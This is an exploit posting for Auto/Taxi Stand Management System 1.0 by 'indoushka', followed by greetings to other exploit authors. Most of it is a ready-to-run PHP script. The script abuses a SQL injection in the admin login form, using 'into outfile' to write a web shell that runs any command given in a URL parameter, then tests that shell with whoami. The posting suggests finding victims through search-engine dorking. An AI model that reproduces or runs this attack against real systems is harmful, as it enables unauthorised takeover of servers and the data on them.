    =============================================================================================================================================| # Title     : Auto/Taxi Stand Management System 1.0 php code injection Vulnerability                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/atsms/';// مسار ثابت لرفع الملف$path = 'C:\www\atsms\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "/admin/index.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#google